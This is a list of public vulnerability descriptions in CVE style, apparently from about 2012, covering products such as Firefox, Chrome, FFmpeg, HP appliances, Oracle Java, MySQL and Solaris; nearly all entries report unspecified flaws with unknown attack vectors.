Multiple unspecified vulnerabilities in the Zingiri Web Shop plugin before 2.4.0 for WordPress have unknown impact and attack vectors.
Unspecified vulnerability in McAfee Email Anti-virus (formerly WebShield SMTP) allows remote attackers to cause a denial of service via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in GLPI-PROJECT GLPI before 0.83.3 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in GLPI-PROJECT GLPI before 0.83.3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey before 2.13 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and CVE-2012-2447.
Unspecified vulnerability in the Post Affiliate Pro (PAP) module for Drupal allows remote authenticated users to read the commissions of other users via unknown attack vectors.
Unspecified vulnerability in bitcoind and Bitcoin-Qt before 0.4.7rc3, 0.5.x before 0.5.6rc3, 0.6.0.x before 0.6.0.9rc1, and 0.6.x before 0.6.3rc1 allows remote attackers to cause a denial of service (process hang) via unknown behavior on a Bitcoin network.
Unspecified vulnerability in Opera before 12.00 on Mac OS X has unknown impact and attack vectors, related to a "moderate severity issue."
Cross-site request forgery (CSRF) vulnerability in the GateIn Portal component in JBoss Enterprise Portal Platform 5.2.2 and earlier allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
GNOME gnome-keyring 3.4.0 through 3.4.1, when gpg-cache-method is set to "idle" or "timeout," does not properly limit the amount of time a passphrase is cached, which allows attackers to have an unspecified impact via unknown attack vectors.
Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.
WordPress before 3.4.1 does not properly restrict access to post contents such as private or draft posts, which allows remote authors or contributors to obtain sensitive information via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the customizer in WordPress before 3.4.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU.
Multiple unspecified vulnerabilities in Google Chrome before 20.0.1132.22 on the Acer AC700; Samsung Series 5, 5 550, and Chromebox 3; and Cr-48 Chromebook platforms have unknown impact and attack vectors.
Unspecified vulnerability in HP ArcSight Connector Appliance 6.3 and earlier and ArcSight Logger 5.2 and earlier allows remote authenticated users to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance hydra with software before 10.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1513.
Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance hydra with software before 10.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1512.
Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance hydra with software before 10.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1511.
Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance hydra with software before 10.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1468.
Unspecified vulnerability in Device Manager in HP XP P9000 Command View Advanced Edition before 7.4.0-00 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.1x and 9.20 allows remote attackers to execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities on the HP LaserJet Pro 400 MFP M425 with firmware 20120625 and LaserJet 400 M401 with firmware 20120621 allow remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability on the HP Integrated Lights-Out 3 (aka iLO3) with firmware before 1.50 and Integrated Lights-Out 4 (aka iLO4) with firmware before 1.13 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Performance Insight 5.31, 5.40, and 5.41, when Sybase is used, allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, a different vulnerability than CVE-2012-3269.
Unspecified vulnerability in HP Performance Insight 5.31, 5.40, and 5.41, when Sybase is used, allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, a different vulnerability than CVE-2012-3270.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.20 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in IBRIX 6.1.196 through 6.1.251 on HP IBRIX X9000 Storage allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 through 11.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1472.
Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 through 11.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1465.
Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 through 11.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1464.
Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 through 11.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1463.
Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 through 11.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1462.
Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 through 11.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1461.
Unspecified vulnerability in HP Operations Orchestration 9.0 before 9.03 allows remote attackers to execute arbitrary code via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Business Availability Center (BAC) 8.07 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP Serviceguard A.11.19 and A.11.20 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Service Manager Server 7.11, 9.21, and 9.30, and HP Service Center Server 6.28, allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability on the HP Integrity Server BL860c i2, BL870c i2, and BL890c i2 with firmware before 26.31 and the HP Integrity Server rx2800 i2 with firmware before 26.30 allows local users to cause a denial of service via unknown vectors.
Cross-site scripting (XSS) vulnerability in the SEOgento plugin for Magento allows remote attackers to inject arbitrary web script or HTML via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Portal Framework.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Siebel Documentation.
Unspecified vulnerability in the Oracle iRecruitment component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect availability via unknown vectors related to Signon.
Unspecified vulnerability in the Oracle VM Virtual Box component in Oracle Virtualization 3.2, 4.0, and 4.1 allows local users to affect availability via unknown vectors related to VirtualBox Core.  NOTE: The previous information was obtained from the October 2012 CPU. Oracle has not commented on claims from another vendor that this issue is related to "incorrect interrupt handling."
Unspecified vulnerability in the Spatial component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users with Create Session privileges to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.1 and 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
Unspecified vulnerability in the Human Resources component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Security Groups.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when running on SPARC, allows local users to affect confidentiality via unknown vectors related to Kernel.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7.0 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when running on SPARC T4 servers, allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect availability via unknown vectors related to Kernel/System Call.
Unspecified vulnerability in Oracle Sun Solaris 11 allows remote attackers to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when running on SPARC, allows local users to affect integrity and availability via unknown vectors related to Logical Domain (LDOM).
Unspecified vulnerability in Oracle Sun Solaris 9, 10, and 11 allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in the Integrated Lights Out Manager CLI in Oracle Sun Products Suite SysFW 8.2.0.a for SPARC and Netra SPARC T3 and T4-based servers, and other versions and servers, allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect integrity via unknown vectors related to Vino server.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Power Management.
Multiple unspecified vulnerabilities in the Oracle JRockit component in Oracle Fusion Middleware 28.2.4 and earlier, and 27.7.3 and earlier, when using JDK/JRE 5 or 6, allow remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: this overlaps CVE-2012-5083, CVE-2012-1531, CVE-2012-5081, and CVE-2012-5085.
Unspecified vulnerability in the PeopleSoft Enterprise Campus Solutions component in Oracle PeopleSoft Products 9.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Self-Service (Student Records).
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Gnome Trusted Extension.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51 and 8.52 allows remote authenticated users to affect availability via unknown vectors related to Query.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect confidentiality via unknown vectors related to Portal.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.1.3.4.2, 11.1.1.5.0, 11.1.1.6.0, and 11.1.1.6.2 allows remote attackers to affect integrity via unknown vectors related to Administration.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.3.4.2, 11.1.1.5.0, 11.1.1.6.0, and 11.1.1.6.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Administration.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect availability via unknown vectors related to Data Mover.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kernel.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI, a different vulnerability than CVE-2012-3183 and CVE-2012-3185.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI, a different vulnerability than CVE-2012-3183 and CVE-2012-3186.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote attackers to affect integrity via unknown vectors related to Advanced UI.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI, a different vulnerability than CVE-2012-3185 and CVE-2012-3186.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect availability via unknown vectors related to Security.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect integrity via unknown vectors related to Tree Manager.
Unspecified vulnerability in the kernel in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 allows remote authenticated users to affect integrity via unknown vectors related to Panel Processor.
Unspecified vulnerability in the Oracle Application Server Single Sign-On component in Oracle Fusion Middleware 10.1.4.3.0 allows remote attackers to affect integrity via unknown vectors related to Redirects, a different vulnerability than CVE-2012-0518.
Unspecified vulnerability in Oracle Java 7 before Update 11 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-0422.  NOTE: some parties have mapped CVE-2012-3174 to an issue involving recursive use of the Reflection API, but that issue is already covered as part of CVE-2013-0422.  This identifier is for a different vulnerability whose details are not public as of 20130114.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect availability via unknown vectors related to Siebel Apps - Multi-channel Technologies.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors related to Autoconfig Templates.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect availability via unknown vectors related to Siebel Core - Server Infrastructure, a different vulnerability than CVE-2012-3169.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect availability via unknown vectors related to Siebel Core - Server Infrastructure, a different vulnerability than CVE-2012-3170.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect availability via unknown vectors related to Siebel Core - Server Infrastructure.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect confidentiality and integrity via unknown vectors related to mailx.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Publish Item.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1.1 allows remote attackers to affect integrity via unknown vectors related to Web Client (CS).
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2012-1533.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet.  NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the PARSEQUERY function allows remote attackers to obtain database credentials via reports/rwservlet/parsequery, and that this issue occurs in earlier versions.  NOTE: this can be leveraged with CVE-2012-3152 to execute arbitrary code by uploading a .jsp file.
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component.  NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the URLPARAMETER functionality allows remote attackers to read and upload arbitrary files to reports/rwservlet, and that this issue occurs in earlier versions.  NOTE: this can be leveraged with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Unix and Linux platforms, allows local users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
Unspecified vulnerability in the Oracle Agile PLM For Process component in Oracle Supply Chain Products Suite 6.0.0.6.3 and 6.1.0.1.14 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Supply Chain Relationship Management.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Web interface.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans, a different vulnerability than CVE-2012-1682.
Unspecified vulnerability in the Oracle JRockit component in Oracle Fusion Middleware 28.2.3 and before, and 27.7.2 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect availability via unknown vectors.
Buffer overflow in the DataDirect ODBC driver, as used in Oracle Hyperion Interactive Reporting 11.1.2.1 and 11.1.2.2, Essbase Server 11.1.2.1 and 11.1.2.2, Production Reporting Server 11.1.2.1 and 11.1.2.2, and Integration Services Server 11.1.2.1 and 11.1.2.2 has unknown impact and attack vectors.
Unspecified vulnerability in Oracle Sun Solaris 11 allows remote attackers to affect integrity via unknown vectors related to pkg.depotd.
Unspecified vulnerability in Oracle SPARC T-Series Servers running System Firmware 8.2.0 and 8.1.4.e or earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Integrated Lights Out Manager.
Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
Unspecified vulnerability in Oracle Sun Solaris 8 and 9 allows local users to affect confidentiality and integrity via unknown vectors related to sort.
Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows remote attackers to affect availability via unknown vectors related to in.tnamed and NameServer.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.0.20 allows remote authenticated users to affect confidentiality via unknown vectors related to Candidate Gateway.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 5.5.06, 6.0, 6.1, and 6.2 allows remote authenticated users to affect confidentiality via unknown vectors related to HTTP.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 5.5.06, 6.0, 6.1, and 6.2 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle MapViewer component in Oracle Fusion Middleware 10.1.3.1, 11.1.1.5, and 11.1.1.6 allows remote attackers to affect integrity via unknown vectors related to Install.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 5.5.06, 6.0, 6.1, and 6.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect integrity via unknown vectors related to Solaris Management Console.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, and CVE-2012-3108.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1768.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
The glBufferData function in the WebGL implementation in Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 does not properly mitigate an unspecified flaw in an NVIDIA driver, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a related issue to CVE-2011-3101.
Caucho Quercus, as distributed in Resin before 4.0.29, does not properly handle unspecified characters in the names of variables, which has unknown impact and remote attack vectors, related to an "HTTP Parameter Contamination" issue.
Skia, as used in Google Chrome before 22.0.1229.92, does not properly render text, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
Integer overflow in the WebGL implementation in Google Chrome before 22.0.1229.79 on Mac OS X allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 22.0.1229.79 does not properly handle graphics-context data structures, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in Google Chrome before 22.0.1229.79 allows remote attackers to bypass the pop-up blocker via unknown vectors.
FFmpeg, as used in Google Chrome before 22.0.1229.79, does not properly handle OGG containers, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors, related to a "wild pointer" issue.
Google Chrome before 22.0.1229.79 does not properly handle plug-ins, which allows remote attackers to cause a denial of service (DOM tree corruption) or possibly have unspecified other impact via unknown vectors.
Buffer overflow in the SSE2 optimization functionality in Google Chrome before 22.0.1229.79 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the PDF functionality in Google Chrome before 22.0.1229.79 allow remote attackers to have an unknown impact via a crafted document.
libxml2 2.9.0-rc1 and earlier, as used in Google Chrome before 21.0.1180.89, does not properly support a cast of an unspecified variable during handling of XSL transforms, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document, related to the _xmlNs data structure in include/libxml/tree.h.
Google Chrome before 21.0.1180.89 does not properly perform a cast of an unspecified variable during handling of run-in elements, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Multiple unspecified vulnerabilities in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allow remote attackers to have an unknown impact via a crafted document.
Buffer overflow in the JS API in the PDF functionality in Google Chrome before 20.0.1132.43 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The image-codec implementation in the PDF functionality in Google Chrome before 20.0.1132.43 does not initialize an unspecified pointer, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Google Chrome before 20.0.1132.43 does not properly set array values, which allows remote attackers to cause a denial of service (incorrect pointer use) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the UI in Google Chrome before 20.0.1132.43 on Mac OS X allows attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple integer overflows in libxml2, as used in Google Chrome before 20.0.1132.43 and other products, on 64-bit Linux platforms allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in libavcodec/indeo3.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.5 has unknown impact and attack vectors, related to "reallocation code" and the luma height and width.
Double free vulnerability in the mpeg_decode_frame function in libavcodec/mpeg12.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.5, has unknown impact and attack vectors, related to resetting the data size value.
Unspecified vulnerability in the ac3_decode_frame function in libavcodec/ac3dec.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to the "number of output channels" and "out of array writes."
Unspecified vulnerability in libavcodec/avs.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to dimensions and "out of array writes."
Unspecified vulnerability in the ff_ivi_process_empty_tile function in libavcodec/ivi_common.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors in which the "tile size ... mismatches parameters" and triggers "writing into a too small array."
Unspecified vulnerability in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 has unknown impact and attack vectors, related to the "put bit buffer when num_saved_bits is reset."
Unspecified vulnerability in the decode_dds1 function in libavcodec/dfa.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an "out of array write."
Unspecified vulnerability in the decode_frame_mp3on4 function in libavcodec/mpegaudiodec.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.5 has unknown impact and attack vectors related to a calculation that prevents a frame from being "large enough."
Unspecified vulnerability in the vc1_decode_frame function in libavcodec/vc1dec.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to inconsistencies in "coded slice positions and interlacing" that trigger "out of array writes."
Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 have unknown impact and attack vectors related to (1) size of "mclms arrays," (2) "a get_bits(0) in decode_ac_filter," and (3) "too many bits in decode_channel_residues()."
Unspecified vulnerability in the decode_mb_info function in libavcodec/indeo5.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors in which the "allocated tile size ... mismatches parameters."
Unspecified vulnerability in the lag_decode_zero_run_line function in libavcodec/lagarith.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors related to "too many zeros."
Unspecified vulnerability in the decode_init function in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 has unknown impact and attack vectors, related to the samples per frame.
